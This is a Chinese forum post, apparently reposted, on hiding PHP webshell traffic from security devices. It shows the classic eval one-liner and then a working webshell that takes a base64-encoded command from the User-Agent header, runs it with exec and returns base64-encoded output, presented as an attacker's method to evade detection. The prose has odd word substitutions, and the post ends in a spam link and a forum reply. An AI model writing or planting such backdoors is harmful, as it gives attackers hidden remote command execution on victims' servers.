PHPwebshell 流量加密
<h2 style="color: black; text-align: left; margin-bottom: 10px;">PHPwebshell 流量加密分析</h2>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">日前</span>市场上的安全设备<span style="color: black;">针对</span>恶意数据流都可<span style="color: black;">精细</span>检测其特征,而常规的一句话木马、菜刀等特征过于<span style="color: black;">显著</span>。<span style="color: black;">况且</span>大部分的黑客<span style="color: black;">工具</span>都被<span style="color: black;">加入</span>特征库,<span style="color: black;">因此</span>攻击方的攻击手法很容易被针对,攻击链路<span style="color: black;">亦</span>很容易被还原。</p>
<h2 style="color: black; text-align: left; margin-bottom: 10px;">php一句话</h2>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><?php eval(@$_POST); ?>常规的一句话木马传输参数均为明文传输,很容被针对检测。</p>
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://pic2.zhimg.com/80/v2-6cd93966fff7cb640ae5c0f829a80e31_720w.webp" style="width: 50%; margin-bottom: 20px;"></div>一句话webshell<span style="color: black;">拜访</span>
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://pic4.zhimg.com/80/v2-9515fe6b82e88f4e1a2d6f18d05331c7_720w.webp" style="width: 50%; margin-bottom: 20px;"></div>一句话webshell流量<h2 style="color: black; text-align: left; margin-bottom: 10px;">简单加密</h2>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">常规的webshell是将所需的payload<span style="color: black;">经过</span>post进行传参,很容易被流量设备检测。如下,<span style="color: black;">能够</span><span style="color: black;">经过</span>user_agent base64加密进行传参执行命令。</p>
<h3 style="color: black; text-align: left; margin-bottom: 10px;">Webshell原代码:</h3>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><?php</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">$dd = $_SERVER;</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">//获取user_agent参数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">$qq = base64_decode($dd);</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">//解密user_agent参数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">$jjj = exec ($qq,$out);</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">//执行user_agent参数</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">for ($i=0 ;$i < count($out) ;$i++){</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> $ls = $ls.$out[$i]."\n";</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">}</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">echo base64_encode($ls);</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">//加密输入执行后的系统命令</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">?></p>
<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://pic4.zhimg.com/80/v2-ce6e7404f83d5588c6a40a5f2893b56b_720w.webp" style="width: 50%; margin-bottom: 20px;"></div>user_agent传参<div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://pic2.zhimg.com/80/v2-0ec1255835a3edff04c5811dddc201dd_720w.webp" style="width: 50%; margin-bottom: 20px;"></div>数据流量图<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">顺手配上一个简单python</p>
可以发布外链的网站 http://www.fok120.com/ 楼主的文章深得我心,表示由衷的感谢!
页:
[1]